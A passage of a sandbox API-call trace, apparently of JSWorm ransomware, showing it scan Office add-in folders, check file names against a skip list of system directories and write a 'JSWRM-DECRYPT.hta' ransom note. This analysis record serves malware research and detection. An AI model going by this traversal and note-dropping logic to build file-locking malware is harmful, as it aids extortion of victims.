hHeap=0x1e0000) returned 1 [0124.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0124.281] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1434d390, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1434d390, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="id", cAlternateFileName="")) returned 1 [0124.281] lstrcmpiW (lpString1="id", lpString2=".") returned 1 [0124.281] lstrcmpiW (lpString1="id", lpString2="..") returned 1 [0124.282] lstrcmpiW (lpString1="id", lpString2="...") returned 1 [0124.282] lstrcmpiW (lpString1="id", lpString2="windows") returned -1 [0124.282] lstrcmpiW (lpString1="id", lpString2="recovery") returned -1 [0124.282] lstrcmpiW (lpString1="id", lpString2="perflogs") returned -1 [0124.282] lstrcmpiW (lpString1="id", lpString2="documents and settings") returned 1 [0124.282] lstrcmpiW (lpString1="id", lpString2="$RECYCLE.BIN") returned 1 [0124.282] lstrcmpiW (lpString1="id", lpString2="system volume information") returned -1 [0124.282] lstrcmpiW (lpString1="id", lpString2="msocache") returned -1 [0124.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0124.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0124.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0124.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0124.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0124.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0124.282] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\id\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\id\\jswrm-decrypt.hta")) returned 0xffffffff [0124.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0124.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0124.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0124.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0124.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0124.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0124.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0124.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0124.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0124.284] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\id\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\id\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0124.285] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.285] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0124.286] CloseHandle (hObject=0x314) returned 1 [0124.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0124.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0124.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0124.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0124.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0124.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0124.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0124.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0124.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0124.286] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\id\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\id\\jswrm-decrypt.hta")) returned 0x20 [0124.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0124.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0124.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0124.286] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\id\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1434d390, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40be127a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232080 [0124.286] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0124.286] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1434d390, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40be127a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0124.286] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0124.286] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0124.286] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc2ff666, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2ff666, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1466e4fb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4658, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0124.286] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0124.286] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0124.286] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0124.286] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0124.286] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0124.287] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0124.287] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0124.287] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.287] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0124.287] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0124.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0124.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0124.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2412b8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0124.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0124.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241268, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0124.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0124.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0124.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0124.287] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40be127a, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x40be127a, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x40be127a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0124.287] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0124.287] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0124.287] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0124.287] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0124.287] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0124.287] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0124.287] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0124.287] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0124.287] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0124.287] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0124.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0124.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0124.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0124.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0124.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0124.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0124.288] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf43e3cb7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf43e3cb7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4409f1c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x12060, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0124.288] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0124.288] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0124.288] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0124.288] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0124.288] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0124.288] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0124.288] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0124.288] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.288] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0124.288] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0124.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0124.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0124.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0124.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0124.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d298, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0124.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0124.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0124.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0124.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.289] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4620012, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4620012, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4646280, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0124.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0124.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0124.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0124.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0124.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0124.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0124.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0124.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0124.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0124.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0124.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0124.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d698, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0124.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0124.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0124.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f280 [0124.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0124.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0124.289] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf18f9628, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf18f9628, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6b10, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0124.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0124.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0124.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0124.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0124.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0124.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0124.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0124.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.290] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0124.290] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0124.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0124.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0124.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0124.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 